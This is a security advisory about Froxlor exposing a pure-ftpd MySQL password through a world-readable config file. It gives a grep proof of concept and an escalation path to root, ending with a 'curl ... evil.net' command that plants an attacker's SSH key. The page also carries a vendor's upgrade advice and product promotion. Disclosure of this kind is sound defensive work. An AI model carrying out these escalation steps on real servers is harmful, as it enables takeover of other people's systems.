GHSA-34qg-65m4-f23m
HIGHFroxlor: /etc/pure-ftpd/db/mysql.conf is chmod 644 but contains <SQL_UNPRIVILEGED_PASSWORD>
Blast Radius
froxlor/froxlorReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.
Description
Summary
In Froxlor 2.1.9 and in the HEADs of the main, v2.2 and v2.1 branches , the XML templates in lib/configfiles/ set chmod 644 for /etc/pure-ftpd/db/mysql.conf, although that file contains <SQL_UNPRIVILEGED_PASSWORD>. At least on Debian 12, all parent directories of /etc/pure-ftpd/db/mysql.conf are world readable by default, thus exposing these credentials to all users with access to the system. Only Froxlor instances configured to use pure-ftpd are affected/vulnerable.
Details
https://github.com/froxlor/Froxlor/blob/2.1.9/lib/configfiles/bookworm.xml#L3075
PoC
As non-privileged user:
nobody@mail:/tmp$ grep MYSQLPassword /etc/pure-ftpd/db/mysql.conf
MYSQLPassword MySecretMySQLPasswordForFroxlor
Impact
Any unprivileged user with "command/code execution" access to the system can trivially obtain the credentials granting access to the froxlor MySQL database. This holds true even for virtual users without SSH access as long as they are able to upload their own PHP scripts or other CGIs, and works even if the admin has setup a separate php-fpm pool that runs as their own user.
Side note: This access to the database can be leveraged to obtain Froxlor admin privileges, and subsequently root privileges. For example:
- Use the database credentials to extract or change a Froxlor admin's password hash and TOTP seed value.
- Log into Froxlor as that admin.
- Set the
Cron-daemon reload commandin/admin_settings.php?page=overview&part=crondto something likecurl -o /root/.ssh/authorized_keys evil.net. - Wait a few minutes until the relevant cronjob runs, then log in via SSH.
Please consider using passwordless unix socket authentication. Current versions of MySQL, MariaDB and Percona allow completely removing/omitting database passwords for database connections going through a unix socket, this works even for use cases where the database user has a different name than the system account running the database client: https://dev.mysql.com/doc/refman/5.7/en/socket-pluggable-authentication.html
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐘Packagist | froxlor/froxlor | all versions | 2.2.0 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for froxlor/froxlor. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update froxlor/froxlor to 2.2.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-34qg-65m4-f23m is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-34qg-65m4-f23m is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-34qg-65m4-f23m. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-34qg-65m4-f23m in your dependencies?
O3 detects GHSA-34qg-65m4-f23m across Packagist dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.